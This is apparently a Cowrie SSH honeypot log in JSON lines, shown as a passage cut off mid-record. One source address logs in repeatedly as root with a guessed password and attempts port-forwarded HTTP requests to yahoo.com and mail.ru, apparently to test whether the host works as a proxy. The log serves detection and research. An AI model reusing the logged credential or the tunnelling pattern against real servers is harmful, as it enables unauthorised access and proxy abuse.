{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":27658,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:27658","sensor":"my-vps","timestamp":"2025-08-31T03:52:37.925923Z","session":"499246fd7be9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:37.977500Z","src_ip":"77.83.207.83","session":"499246fd7be9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":3694,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:3694","sensor":"my-vps","timestamp":"2025-08-31T03:52:38.122126Z","session":"499246fd7be9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:38.173768Z","src_ip":"77.83.207.83","session":"499246fd7be9"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:38.225941Z","src_ip":"77.83.207.83","session":"499246fd7be9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35207,"dst_ip":"1.2.3.4","dst_port":22,"session":"7790823facba","protocol":"ssh","message":"New connection: 77.83.207.83:35207 (1.2.3.4:22) [session: 7790823facba]","sensor":"my-vps","timestamp":"2025-08-31T03:52:38.274399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:38.275177Z","src_ip":"77.83.207.83","session":"7790823facba"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:38.325297Z","src_ip":"77.83.207.83","session":"7790823facba"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:38.573095Z","src_ip":"77.83.207.83","session":"7790823facba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7149,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:7149","sensor":"my-vps","timestamp":"2025-08-31T03:52:38.623887Z","session":"7790823facba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:38.673980Z","src_ip":"77.83.207.83","session":"7790823facba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13738,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:13738","sensor":"my-vps","timestamp":"2025-08-31T03:52:38.816117Z","session":"7790823facba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:38.865954Z","src_ip":"77.83.207.83","session":"7790823facba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":3114,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:3114","sensor":"my-vps","timestamp":"2025-08-31T03:52:39.008087Z","session":"7790823facba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:39.058864Z","src_ip":"77.83.207.83","session":"7790823facba"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:39.109718Z","src_ip":"77.83.207.83","session":"7790823facba"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35325,"dst_ip":"1.2.3.4","dst_port":22,"session":"b29a05a652f2","protocol":"ssh","message":"New connection: 77.83.207.83:35325 (1.2.3.4:22) [session: b29a05a652f2]","sensor":"my-vps","timestamp":"2025-08-31T03:52:39.158294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:39.159405Z","src_ip":"77.83.207.83","session":"b29a05a652f2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:39.209210Z","src_ip":"77.83.207.83","session":"b29a05a652f2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:39.457124Z","src_ip":"77.83.207.83","session":"b29a05a652f2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11550,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:11550","sensor":"my-vps","timestamp":"2025-08-31T03:52:39.507913Z","session":"b29a05a652f2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:39.558492Z","src_ip":"77.83.207.83","session":"b29a05a652f2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":21582,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:21582","sensor":"my-vps","timestamp":"2025-08-31T03:52:39.700112Z","session":"b29a05a652f2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:39.749934Z","src_ip":"77.83.207.83","session":"b29a05a652f2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":251,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:251","sensor":"my-vps","timestamp":"2025-08-31T03:52:39.892219Z","session":"b29a05a652f2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:39.941997Z","src_ip":"77.83.207.83","session":"b29a05a652f2"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:39.992530Z","src_ip":"77.83.207.83","session":"b29a05a652f2"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35450,"dst_ip":"1.2.3.4","dst_port":22,"session":"778fcb5b6de9","protocol":"ssh","message":"New connection: 77.83.207.83:35450 (1.2.3.4:22) [session: 778fcb5b6de9]","sensor":"my-vps","timestamp":"2025-08-31T03:52:40.042268Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:40.043163Z","src_ip":"77.83.207.83","session":"778fcb5b6de9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:40.093764Z","src_ip":"77.83.207.83","session":"778fcb5b6de9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:40.345177Z","src_ip":"77.83.207.83","session":"778fcb5b6de9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23347,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:23347","sensor":"my-vps","timestamp":"2025-08-31T03:52:40.396387Z","session":"778fcb5b6de9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:40.446951Z","src_ip":"77.83.207.83","session":"778fcb5b6de9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":4331,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:4331","sensor":"my-vps","timestamp":"2025-08-31T03:52:40.588650Z","session":"778fcb5b6de9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:40.639045Z","src_ip":"77.83.207.83","session":"778fcb5b6de9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":20710,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:20710","sensor":"my-vps","timestamp":"2025-08-31T03:52:40.780900Z","session":"778fcb5b6de9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:40.831813Z","src_ip":"77.83.207.83","session":"778fcb5b6de9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:40.883077Z","src_ip":"77.83.207.83","session":"778fcb5b6de9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35537,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d6bc4ecdc43","protocol":"ssh","message":"New connection: 77.83.207.83:35537 (1.2.3.4:22) [session: 4d6bc4ecdc43]","sensor":"my-vps","timestamp":"2025-08-31T03:52:40.931416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:40.932305Z","src_ip":"77.83.207.83","session":"4d6bc4ecdc43"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:40.982040Z","src_ip":"77.83.207.83","session":"4d6bc4ecdc43"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:41.230834Z","src_ip":"77.83.207.83","session":"4d6bc4ecdc43"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":31139,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:31139","sensor":"my-vps","timestamp":"2025-08-31T03:52:41.281717Z","session":"4d6bc4ecdc43"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:41.331757Z","src_ip":"77.83.207.83","session":"4d6bc4ecdc43"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":1257,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:1257","sensor":"my-vps","timestamp":"2025-08-31T03:52:41.472321Z","session":"4d6bc4ecdc43"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:41.522235Z","src_ip":"77.83.207.83","session":"4d6bc4ecdc43"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":15543,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:15543","sensor":"my-vps","timestamp":"2025-08-31T03:52:41.664309Z","session":"4d6bc4ecdc43"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:41.714303Z","src_ip":"77.83.207.83","session":"4d6bc4ecdc43"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:41.765037Z","src_ip":"77.83.207.83","session":"4d6bc4ecdc43"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35650,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2bfb93dfc55","protocol":"ssh","message":"New connection: 77.83.207.83:35650 (1.2.3.4:22) [session: c2bfb93dfc55]","sensor":"my-vps","timestamp":"2025-08-31T03:52:41.814748Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:41.824541Z","src_ip":"77.83.207.83","session":"c2bfb93dfc55"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 